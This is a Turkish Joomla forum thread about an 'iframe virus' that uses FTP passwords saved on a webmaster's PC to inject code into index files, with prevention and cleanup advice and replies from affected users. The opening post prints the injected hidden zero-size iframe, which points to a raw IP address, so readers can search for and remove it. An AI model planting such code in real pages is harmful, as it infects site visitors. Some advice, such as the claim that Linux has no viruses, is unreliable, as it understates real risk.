Okumadan geçmeyin İFRAME'den Kurtulma yolları ve Çözüm Önerileri

[nahita]

İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Değerli Joomla kullanıcıları son günlerde webmasterleri zor duruma düşüren bir virüs iframe virüsü. Bu makale virüsün çalışma mantığı, virüsten korunma ve kurtulma yollarını anlatmaktadır.

Virüs'ün çalışma mantığı:
Virüs bazı sitelerden (bu siteler özellikle virüs yayan sitelerde olabilir) sizin bilgisayarınıza bulaşır. Buradanda sizin ftp bilgilerinizi ve ftp programınızı kullanarak sitenize erişim sağlar. Sitenizde ismi index.php, index.htm, index.html olan dosyalara kendisini kopyalıyor. Böylece hem sitenin yazı karakterlerinde bozulma oluyor hem de siteye giren bilgisayarlara virüs bulaştırıyor.

Virsün sitenize eklediği kod yapısı
Virüs sitenize aşağıdaki yapıda bir kod ekliyor.

<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Virüsten korunma yolları
1. Güncel bir antivirüs kullanın. Önerim: Kaspersky, nod32v4, antivir.

2. Kullandığınız ftp programında(örn.filezilla, cuteftp vb.) ftp bilgilerinizi kayıtlı olarak tutmayın. Yani Programda işiniz bittikten sonra geçmişi temizleyin ve bilgilerinizin programda tutulmadığından emin olun. Yani otomatik giriş özelliğini varsa iptal edin. Virüs sizin programda kayıtlı parolalarınızı kullanarak sitenize erişim sağlıyor. Virüsün keyloger(tuş kaydetme) özelliği yok. Direk kayıtlı parolayı kullanıyor.

3. Belirli zaman periyotlarıyla ftp parolanızı değiştirin.

Virüs Bulaşmışsa Kurtulma Yolları

1. Öncelikle ftp kullanıcı adınızı ve parolasını değiştirin.

2. Anti-virüs programınızı güncelleyin.

3. Eğer son günlerde sitenizde önemli güncellemeler yapmadıysanız ve fazla miktarda veri girmediyseniz hosting şirketine mail atın ve virüs bulaşmadan önceki bir tarihteki yedeklerinizi yükletin. Mantık olarak son günlerde veri girmiş olsanız bile virüs veri tabanına bulaşmadığı için önceki yedekleri yükletmeniz verilerin kaybolmasına neden olmaz diye düşünüyorum ama siz her ihtimale karşı veritabanı yedeğinizi alın.

4. Eğer 3. adımı uygulamayıp virüsü elle tek tek temizlemek isterseniz ki uzun ve zahmetli bir iştir. Sitenizin dosyalarını bilgisayarınıza ftp ile çekin.

5. İndex.php ve index html dosyarınızdan yukarıda verdiğim virüsün kodlarını silin. Kodları dosya içinde arama kriteriniz 81.95.145.240 ip numarası olabilir.

6. Virüsü temizledikten sonra dosyalarınızı tekrar hosta yolların. Böylece virüssüz bir siteye kavuşursunuz. En son işinizi garantiye almak için ftp parolanızı değiştirin.

Not: Virüs'ün joomlanın 1.0.x versiyonundan kaynaklandığına dair yanlış inanışlar var. Bu virüs joomla'nın 1.5.x sürümlerine de bulaşabildiği gibi html ve asp bir siteye de bulaşabilir.

Öneriler: Linux işletim sistemi kullanmanızdır. Linuxlardan ise tavsiye ettiğim Linux sürümü Ulusal işletim sistemiz PARDUS'tur. Çünkü linux platformunda virüs olayı yok bu yüzden siteye iframe virüsünün ve diğer virüs ve trojanların bulaşma olasılığı yok denecek kadar az. Çok uzun zamandır PARDUS kullanıyorum herhangi bir virüs vakasıyla karşılaşmadım.

Yazan: Ömer Faruk UYDURAN

[uLvi]

Teşekkürler Faydalı Bilgiler için

[burneato]

aynı olayla bende karsılastım.hatta sunucumda barıdırdırgım diğer sitelere bile bulastı.
verdiğin önerilerin aynısını server firmasında söylediler.
Çok teşekkürler cok güzel bir çalışma olmus tespitlerin mükemmel.
kesinlikle dikkate alınacak bir yazı.çünki bulastıktan sonra cok geç oluyo)

[disspri]

banada musallat oldu bir iframe ve kurtulamıyorum
pc ye format attım siteyi yeniden kurdum ikisini aynı anda yaptım
ancak kurtulamıyorum
avast 4.8 evsurumu kullanıyorum
tum hevesimi kırdı bu iframe kaç gundur ziyan oldum bununla ugraşmaktan

[mono]

Sitemizi göç ettirdikten sonra bu iframe denilen virüs 1,5'a da geçmiş ve burada ki (6.mesaj) yöntemle, bu virüslerden tamamen kurtuldum.

Sunucuda ki tüm dosyaları masa üstüne aldım ve <iframe src= diye başlayan tüm satırları tespit edip tek tek elle kontrol ederek sildim..
Zaten <iframe src= den sonrasın da linkler değiştiği için ilk satır yeterli oluyor.
O find programı gerçekten çok güzel bir porgram, tüm dosya içinde ki kelimeleri bile tarayabiliyor.

Neyse temizlik bittikten sonra sunucuda ki dosyaları silip, temizlenmiş dosyaları geri gönderdim..işlem bitti.

Bu işlemleri Pardus altın da yaptığım için virüs geri bulaşır filan sorunum olmadığı için rahat rahat temizledim ilgili satırları.

Windows'ta tam olarak nasıl olur bilemiyorum ama

[ersin_34]

Merhaba iframe yazılımı yüzünden bütün emeklerim bosa gitti fakat vermiş oldığuz bilgılerle daha sağlıklı bır iş cıkaracagıma eminim. fakt dikkatimi çeken birsey oldu tüm dosyaları en baştan alanıma yükleyecektim ki genelde index. php dosyalarına kendini ekleyen bu virüs aklıma geldi ve sıfırdan bir köşede rar'lı olarak sıkıstırılmıs olarak sakladığım joomla 1.5 dosyasının içindeki index dosyasının içine baktım ve
$mainframe->dispatch($option) buna benzer eklentili yazılar gördüm . Halbuki Bilgisayarımı Sp doctor ve nortonun full sürümü (norton orjinaldir) ile taratmıştım ve diğer siteme ait olan tüm dosyalrımı ve yedeklediklerimde dahil silmiştim. acaba bu uzantılar iframe virüsümüdür yoksa isim benzerliği mi ? sıkıstırılmıs sadece yedekm olsun diye tututgum dosyalarada bulasırmı bu velet? Teşekür ediyorum tüm katklılarınız için

[Trabzonli]

Mainframe virüs değil ,virüs <iframe src= bu kod, index.php , index.html , index.htm , bu dosyalara giriyor, konuyu açan arkadaşın dedikleri gibi . . .

[ersin_34]

Mainframe virüs değil ,virüs <iframe src= bu kod, index.php , index.html , index.htm , bu dosyalara giriyor, konuyu açan arkadaşın dedikleri gibi . . .

Anladım fakat ben bu işten bir türlü kurtulamadım. İlk önce defalarca hosttaki verilerim sildim baştan tekrar yükledim bilgisayarı virüslrden temizledim yine yükledim dosyalrı olmadı joomlayı baska makinalardan idirdimı hosta tekrar olmadı. Sonra Windows u kullanmayı bıraktım pardusu kullanıyorum artık yeniden joomlayı indirdim bu sefer başka bir host aldım ona yükledim 1 gün iyi gitti sonnra yine aynı sıkıntı başgösterdi. (herhangi bir butona tıkladığımda başka bir siteye yönlendiriyor)

Kafanızı çatlattım biliyorum ama son bir sorum daha olacak ben ücretsiz host kullanıyorum dyemi bunlar başgöstereiyor ? (Çünki artık herşeyi denemiş oldum linuxa virüs bulaşmadığına göre!!) değiştirmediğim tek şey üçretsiz hostlar oldu! Ücretli bir host alırsam bunlar başıma gelir mi veya gelirse bana destek çıkarmı host firması?

[Trabzonli]

Free hostu kendini geliştirmek için kullan , sonra öğrendikçe host al ve sitene ordan devam et,o virüs dediğin free dede olur normal ücretli hosttada önemli olan dikkat etmek dosya izinleri filan bunlari iyi inceleyin,warez marez de alip deneme onlar başına belada açar,kullandıgın free host? byethost mu .. . . .

[ersin_34]

Free hostu kendini geliştirmek için kullan , sonra öğrendikçe host al ve sitene ordan devam et,o virüs dediğin free dede olur normal ücretli hosttada önemli olan dikkat etmek dosya izinleri filan bunlari iyi inceleyin,warez marez de alip deneme onlar başına belada açar,kullandıgın free host? byethost mu .. . . .

free host. zat öyle yapıyorum işi tam öğredikten sonra geçmeyi planlıyordum normale. şimdi daha hevesimde kalmadı gibi çok uğraştım hep aynı sonuç nereden kaynaklandığını tam anlayamadım unix hostlar var ne işeyararlar tamda anlayamadım